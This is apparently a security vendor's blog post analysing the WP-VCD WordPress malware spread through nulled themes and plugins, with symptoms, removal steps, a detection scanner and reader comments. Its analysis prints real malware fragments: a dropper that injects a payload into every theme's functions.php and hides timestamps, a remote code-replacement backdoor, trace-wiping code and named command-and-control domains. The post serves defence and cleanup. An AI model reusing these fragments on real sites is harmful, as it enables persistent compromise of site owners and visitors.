Is your website showing any of the following symptoms all of a sudden:

  • A lot of malicious pop-ups
  • Redirecting to unsolicited websites
  • Showing spam URLs
  • Getting slowed down due to high CPU usage (someone might be stealing your resources)
  • Website suspended by the host

Then there is a high chance that you are infected with WP-VCD malware.

The WP-VCD malware gets a foothold in your site by leveraging loopholes in outdated plugins and themes. In most WP-VCD cases, web owners infect themselves by installing free/nulled plugins & themes from unauthorized sources; in the remaining cases the infection spreads from an already infected site.

It’s been a while since WP-VCD malware made its first appearance but the campaign is still going on with full fervor. In fact, most infections in WordPress sites result from WP-VCD malware.

See the graph below:

As many as 56% of WordPress website infections originate from infected plugins. Additionally, infected themes make up 6% of all WordPress infections.

What is WordPress WP-VCD Malware?

WP-VCD malware comes pre-installed with pirated versions of a paid theme/plugin. These nulled (pirated) themes and plugins contain malicious scripts that get deployed when you install them.

After setting its foot on your website through a nulled theme, it goes on to infect every other theme on your site. On a shared server, the malware then propagates to every unprotected site hosted on that server.

Preventing WP-VCD infections is quite difficult, because web owners install this malware on their websites themselves. The exceptionally good SEO done for these nulled themes & plugins makes the situation worse.

If you search for “Free [plugin name] download”, it is almost certain that the top results will be sites distributing the WP-VCD malware. This often traps web developers & designers into installing the malware.

An excerpt of the WP-VCD dropper script is below. It walks every theme directory (one level of nesting included) and prepends its payload to each functions.php that does not yet contain the WP_V_CD marker, then resets the file's timestamp so the change is less noticeable:

// Per-site key: the payload's placeholder is replaced with an MD5 of the host name and AUTH_SALT
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
    foreach ($list as $_)
    {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
        {
            // Remember the original change time so it can be restored after the write
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
            {
                // Only inject once: the WP_V_CD marker signals an already infected file
                if (strpos($content, 'WP_V_CD') === false)
                {
                    $content = $install_code . $content ;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                }
                else
                {
                    $ping = false;
                }
            }
        }
        else
        {
            // No functions.php at this level: descend one directory and repeat
            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
            foreach ($list2 as $_2)
            {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                    {
                        if (strpos($content, 'WP_V_CD') === false)
                        {
                            $content = $install_code . $content ;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                            $ping2 = true;
                        }

What are the symptoms of wp-vcd malware?

  1. A new WordPress administrator added without your knowledge
  2. Your hosting provider suspended your WordPress account because of a wp-vcd malware attack, to protect other websites
  3. Account suspension by the host due to excessive resource consumption
  4. SEO spam such as Japanese search results or a pharma attack in Google Search Results.
    [Screenshot: Google search results spammed by the wp-vcd hack]
    Related: WordPress spam search results and how to fix them.
  5. Unknown JavaScript code in the source of your website
  6. Pages on your website being redirected to shady websites
  7. Unknown PHP files in the wp-includes folder which are not in the WordPress GitHub repository
  8. PHP files in the wp-content/uploads directory and its sub-directories
  9. Malware scanner flags WP-VCD on your website.
    [Screenshot: Astra’s malware scanner flagging WP-VCD]

Why were you infected with wp-vcd Malware?

There can be many reasons for the infection. The most common are:

  1. Use of a nulled theme – in many cases the wp-vcd malware comes bundled with themes downloaded from nulled-theme websites
  2. Use of outdated WordPress plugins & themes on your site
  3. No Web Application Firewall (WAF) installed to block hacking attempts

How does WP-VCD malware work?

Suppose you have installed & activated the nulled theme.

The next thing WP-VCD does is create backdoors on your website. Usually, this is done by adding hidden WordPress admin users.

These user accounts are controlled remotely by the WP-VCD operators through a large command and control (C2) infrastructure. Hackers keep a tight grip on your website through these backdoors, and this is how they reinfect your site after every partial cleanup.

Some variants of the malicious codes have been seen to modify core WordPress files. Sometimes, they also add new files in the /wp-includes directory.

Long story short, this is what happens in a WP-VCD malware hack:

  1. The WP-VCD malware creates spam URLs on the website (also referred to as URL injection)
  2. The malware creates a backdoor which gives hackers access to your website for extended periods
  3. Hackers exploit vulnerabilities in WordPress plugins & themes. Once installed, these plugins & themes drop the WP-VCD malware on the vulnerable site.
  4. WP-VCD spreads to unprotected sites on the same server and gets a stronger grip.

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to check for modifications to WordPress core files, plugins & themes.

Analysis of what WP-VCD malware does

Deploys malicious scripts

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code checks whether the deployer script is present and, if so, executes it. As you can see in the code above, the file being included is class.theme-modules.php. Depending on where the infection originates (a theme or a plugin), the malicious script lives in class.theme-modules.php or class.plugin-modules.php respectively.

In the example above, it is the class.theme-modules.php file that actually installs the wp-vcd malware into the other themes installed (enabled/disabled) and creates all the other malicious files.

Creates a backdoor

Code snippet of the malware code:

<?php

//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
        @file_put_contents('wp-tmp.php', $tmpcontent);
    }
}

As we discussed in the earlier section, this code creates a new admin user with a name similar to 100010010. The objective of this backdoor admin account is to make sure that the hacker can still access the website even after you delete the malicious code, so that the attackers can come back and attack your website at a later point in time.

Besides giving the hacker another way into the site, backdoors perform several other functions for hackers. Primarily, the backdoor:

  1. Adds more backdoors
  2. Gets more instructions from hackers

Adds more backdoors

WP-VCD operators can use the backdoor to add any new code to the functions.php file. Here is how:

case 'change_code';
    if (isset($_REQUEST['newcode']))
    {
        if (!empty($_REQUEST['newcode']))
        {
            if ($file = @file_get_contents(__FILE__))
            {
                if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode))
                {
                    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                }
            }
        }
    }
    break;

With the change_code feature of an already injected backdoor, the hacker can inject any ‘new code’ into your site: whatever sits between the //$start_wp_theme_tmp and //$end_wp_theme_tmp markers in the backdoor file is replaced with the contents of the newcode request parameter.

Gets instructions from hackers

Sometimes hackers inject URLs of their C2 servers. These URLs are later called to push actions across all infected sites in one go. Domains such as www.krilns.com/code.php, krilns.pw, krilns.top, etc. have been found doing this on many WP-VCD infected sites.

Infects other files and sites

The next thing that the WP-VCD malware does is to expand itself. It deploys the malicious script in every theme and plugin on your site. Next, it goes on to find vulnerable sites on the same server and infects them too.

This propagation starts with the deployment of a script located at wp-includes/wp-vcd.php. It is followed by modifications to the core wp-includes/post.php file, which ultimately executes the code in wp-vcd.php on every page load.

Destroys the trails

As a final step, the WP-VCD malware removes the original signs of infection from the theme/plugin. If you look closely at the following code, you’ll see how preg_replace() is used to strip everything between //install_code and //install_code_end, and then to remove the empty <?php ?> block left behind.

if ($file = @file_get_contents(__FILE__)) {
    $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
    $file = preg_replace('!<\?php\s*\?>!s', '', $file);
    @file_put_contents(__FILE__, $file);
}

Infected by the wp-vcd malware? Drop us a message in the chat widget and we’ll be happy to help. Click here for immediate malware cleanup

How to remove the wp-vcd malware infection

With Astra, you can remove the infection with a click of a button. Simply run a scan with Astra’s malware scanner and remove the infected files right from the dashboard.

If you have not yet tried Astra’s one-click malware removal, get it from here. To remove WP-VCD manually read on.

First things first, search for occurrences of the below files/strings on your server and examine their contents.

Run a diff of the file contents against the corresponding files in the WordPress core GitHub repository or the theme/plugin directory. You can use either approach (or both), over SSH or from your IDE.

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.wp.php
  5. admin.txt
  6. codexc.txt
  7. code1.php
  8. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

Files such as wp-vcd.php, wp-tmp.php and class.theme-modules.php can be deleted from the server once every reference to them has been removed from the functions.php file of every theme (active or inactive) and from the core WordPress files in the website root.
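To turn the two approaches above into a repeatable check, here is an added Python triage script; it is not Astra's code and is not from the original post. It walks a WordPress root and reports the file names from Approach 1, the strings from Approach 2, the include_once stub that WP-VCD prepends to a theme's functions.php, the //install_code and $start_wp_theme_tmp markers seen in the backdoor snippets above, PHP files under wp-content/uploads (symptom 8), and any file in wp-includes that is missing from a manifest of the clean release (symptom 7). The sample site it scans is constructed inline in a temporary directory; the core_manifest is assumed to be built from a clean download of the same WordPress version, and the class.plugin-modules.php name comes from the analysis section above.

```python
"""Triage scanner for the WP-VCD indicators listed in this article.

Added example (not Astra's code). It reports the file names from Approach 1,
the strings from Approach 2, the include_once stub and backdoor markers shown
in the analysis, PHP files under wp-content/uploads, and files in wp-includes
that a manifest of the clean release does not list.
"""
import tempfile
from pathlib import Path

# File names the article lists as commonly created by WP-VCD.
SUSPECT_FILENAMES = {
    "wp-vcd.php", "wp-tmp.php", "class.wp.php", "admin.txt", "codexc.txt",
    "code1.php", "class.theme-modules.php", "class.plugin-modules.php",
}

# Strings the article lists as found inside infected files, plus the markers
# the dropper (WP_V_CD), the installer (//install_code) and the change_code
# backdoor ($start_wp_theme_tmp) use.
SUSPECT_STRINGS = [
    "tmpcontentx", "function wp_temp_setupx", "wp-tmp.php",
    "derna.top/code.php", "stripos($tmpcontent, $wp_auth_key)",
    "WP_V_CD", "class.theme-modules.php", "class.plugin-modules.php",
    "//install_code", "$start_wp_theme_tmp",
]

TEXT_SUFFIXES = {".php", ".txt", ".html", ".js"}


def scan_wordpress_root(root, core_manifest=frozenset()):
    """Return a sorted list of (relative_path, reason) findings.

    core_manifest: relative paths (wp-includes/...) present in a clean copy
    of the same WordPress release; any other file there is reported.
    """
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name in SUSPECT_FILENAMES:
            findings.add((rel, "suspect filename"))
        # Uploads should only ever hold media, never executable PHP.
        if rel.startswith("wp-content/uploads/") and path.suffix.lower() == ".php":
            findings.add((rel, "php file in uploads"))
        if rel.startswith("wp-includes/") and core_manifest and rel not in core_manifest:
            findings.add((rel, "not in core manifest"))
        if path.suffix.lower() in TEXT_SUFFIXES:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            for needle in SUSPECT_STRINGS:
                if needle in text:
                    findings.add((rel, f"contains {needle!r}"))
    return sorted(findings)


def build_sample_site(base):
    """Constructed sample install (not a real site): one clean theme, one
    infected theme, a dropped wp-includes file and a PHP file in uploads."""
    base = Path(base)
    clean = base / "wp-content/themes/clean-theme"
    bad = base / "wp-content/themes/nulled-theme"
    inc = base / "wp-includes"
    uploads = base / "wp-content/uploads/2020/01"
    for d in (clean, bad, inc, uploads):
        d.mkdir(parents=True, exist_ok=True)
    (clean / "functions.php").write_text("<?php\nadd_theme_support('title-tag');\n")
    # The one-line stub from the article, prepended to an otherwise normal file.
    (bad / "functions.php").write_text(
        "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
        "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>\n"
        "<?php\nadd_theme_support('title-tag');\n"
    )
    (bad / "class.theme-modules.php").write_text("<?php\n//install_code1\nerror_reporting(0);\n")
    (inc / "post.php").write_text("<?php // genuine core file\n")
    (inc / "wp-vcd.php").write_text("<?php // file dropped by the malware\n")
    (uploads / "image.jpg").write_bytes(b"\xff\xd8\xff\xe0")
    (uploads / "shell.php").write_text("<?php // PHP does not belong in uploads\n")
    return base


def demo():
    """Scan the constructed sample; in practice pass the real site root."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_wordpress_root(tmp, core_manifest={"wp-includes/post.php"})


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:32} {rel}")
```

Run it against a real install with scan_wordpress_root('/var/www/html', core_manifest) and treat the output as a list of files to open and diff, not as proof of infection on its own: a file name alone can collide with something legitimate, while a hit on the //install_code marker, the include_once stub, or a PHP file in uploads warrants immediate attention. Remember from the dropper excerpt that the malware resets timestamps with touch(), so do not rely on modification times to narrow the search.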

Check out this step-wise WordPress malware removal blog post for the full process. 

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – Make sure your website files and database are 100% clean and malware-free
    2. Protect – Install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – Run regular malware scans to check whether files or the database have been tampered with
  2. Delete unused WordPress themes (even if disabled)
  3. Completely avoid nulled themes on your website
  4. Update WordPress core, plugins and themes

Here’s a complete video that you need to follow step by step to secure your WordPress site.

Cleaning websites infected with such malware is not always easy, because once activated on a website they tend to infect other areas of it too by installing different kinds of malicious code.

Further, this particular malware also creates a backdoor that gives the bad guys complete control of your site. Hence, it is important to have an effective security strategy that thoroughly analyses your website and then completely removes the hack from it.

WordPress malware removal steps

If you think you are hacked with this malware, do let us know. We are happy to help 🙂 Click here for immediate help.

Astra

At Astra, we have a team of security experts who daily resolve dozens of web security issues. Our web application firewall ASTRA protects your website 24×7 from XSS, SQL injection, bad bots, malware and 80+ other threats.

Take an Astra Demo now.


About The Author

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cyber security community and shared his knowledge at various forums & invited talks.

10 Comments

  1. Thank you for this informative read, I have shared it on Twitter.

  2. thank you very much for the detailed explanation.

    I have a question,

    I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
    I searched through the SQL for all the string patterns and found nothing.

    Does it mean I’m safe?

    • Aakanchha Keshri

      Hi Ahiad, what you’ve done so far should remove the malware. We’ve also seen in some cases that wp-includes/wp-tmp.php get created which could store the backdoors. Removing these files removes the infection, but the vulnerability would also have to be identified and patched. To harden your WordPress’ security further you can use this free plugin here – https://wordpress.org/plugins/wp-security-hardening/

  3. That’s a really good point. This article is very helpful and informative. Thanks for sharing.

  4. Thank you for this useful article, it helped me a lot.

  5. Thanks a lot. I am currently experiencing this. At first I thought my host was just making life a living hell for me but now I realize. I will surely follow this guide.
